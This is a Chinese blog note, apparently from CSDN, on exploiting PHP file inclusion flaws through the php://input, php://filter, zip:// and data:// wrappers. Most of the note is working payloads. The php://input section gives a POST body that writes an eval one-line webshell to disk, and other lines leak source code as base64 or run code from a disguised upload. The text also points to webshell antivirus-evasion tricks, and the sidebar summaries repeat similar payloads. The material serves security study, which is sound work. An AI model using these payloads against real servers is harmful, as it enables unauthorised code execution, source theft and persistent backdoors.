文件包含之伪协议的使用

最新推荐文章于 2024-05-14 21:12:14 发布
最新推荐文章于 2024-05-14 21:12:14 发布
阅读量637 收藏 1
点赞数
分类专栏: 网络安全 笔记 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56438857/article/details/126052271
版权

目录

文件包含漏洞利用实例

1. php流的input

http://127.0.0.1/include/03/index.php?page=php://input

然后要用post类型提交数据

这里可以这么提交:

<?php 
fputs(fopen("shell.php","w"),"<?php @eval(\$_POST["hack"])?>")
?>

这里通过直接写入一个木马文件,来进行攻击。

所以不只是文件上传点可以写入木马,php的input流也可以写入一句话木马。

2. php流的filter协议

?page=php://filter/read=convert.base64-encode/resource=index.php

?page=php://filter/convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行。

虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。

allow_url_include和allow_url fopen都不做要求,这是非常大的优势。

3. zip压缩流

?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt

先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。、

注意,这里必须是绝对路径

4. data协议

?file=data://text/plain,<?php phpinfo();?>

但在利用时有很多问题。

后面php代码容易被查杀,所以要灵活利用编码等方法,可以借鉴webshell免杀,原理都是一样的。

<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。

解决思路:

不写后面的 ?> 因为PHP里面其实不需要写后面的 前面的 ;号就已经说明结束了。

如果没有;号就必须写 ?>作为结束。

一青一柠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
getshell思路
Bu2n的博客
02-23 5703
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
文件包含漏洞与伪协议利用
Cracker's Blog
03-09 1279
包含函数 php 函数 include() include_once() request() request_once() 包含文件:有php代码就当作php运行,有字符串则输出字符串。 远程包含:可以包含url文件(fopen,include) 伪协议包含:php://input ...
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1656
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3118
渗透测试-文件包含漏洞以及php伪协议的应用
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1077
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含漏洞】——文件包含漏洞进阶_PHP伪协议
weixin_45588247的博客
08-05 1720
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
三、Web漏洞-文件操作
weixin_70557959的博客
05-06 508
目录 31、文件操作之文件包含漏洞全解 原理 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 2.有限制文件包含漏洞 二、远程文件包含代码测试——原理 1.无限制 2.有限制 三、各种协议流提交流测试-协议 php伪协议 - 看不尽的尘埃 - 博客园 1.读取文件源码filter 2.执行php代码input 3.写入一句话木马 input 4.读取文件file:// 5.数据流封装data:// 四、某CMS程序文件包含利用-黑盒(...
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
文件下载包伪代码,可以解决部分问题
07-21
综上所述,“文件下载包伪代码”涉及的主要是Web前端如何实现文件下载,包括各种API的使用、浏览器兼容性处理以及应对各种场景的策略。通过理解这些知识点,开发者可以更有效地实现在Web应用中进行文件下载的功能。
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
什么是php伪协议,并举例说明
02-25
1. 伪协议的安全性:确保在使用自定义伪协议时,正确处理潜在的安全风险,如输入验证和权限控制。 2. 性能优化:虽然伪协议提供了便利,但过度使用可能会影响程序性能,尤其是在处理大量数据时。 3. 文档和兼容性:...
信息安全技术:PHP伪协议.pptx
11-01
PHAR文件可以包含整个项目,便于分发和部署,但应确保对PHAR的签名验证以防止恶意代码注入。 8. rar:// - RAR `rar://`协议允许PHP脚本直接操作RAR文件,但这通常不是PHP的标准特性,需要额外的扩展支持。 9. ...
文件包含之——phar伪协议
abc18964814133的博客
05-09 6388
文件上传之phar伪协议
php伪协议
weixin_60719780的博客
01-27 4475
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
伪协议利用
一只web狗
06-23 1650
PHP伪协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
CISP-PTE维持记录(2022-03-30)
orange777
03-30 6871
0x00前言 初考CIST-PTE是在2019年,今天做了下维持,对其中的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其中标注的答案部分有极个别可能有误,请慎重! 这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧 0x01选择题 1、()是最常用的公钥密码算法 (2分) A 量子密码B DSAC RSAD 椭圆曲线 2、通过修改HTTP Headers 中的哪个键值可以伪造来源网址() (2分) A User-AgentB Accept
(31)【文件包含漏洞】简介、原理、危害、分类、函数、伪协议、利用过程……
04-10 3818
【web-文件包含漏洞】
小迪安全42WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议
weixin_73760178的博客
03-17 1022
url编码2次: php//filter/write=convert.base64-decode/resource=123.php content=aaPD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==因为考虑到urldecode,因此需要进行加密,从而去满足函数的要求,网页会第一次解密,函数会第二次解密,所以我们需要连续加密两次。url编码2次: php://filter/write=string.rot13/resource=2.php
PHP伪协议总结
weixin_52385170的博客
01-15 594
php伪协议 封装协议 内置协议
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值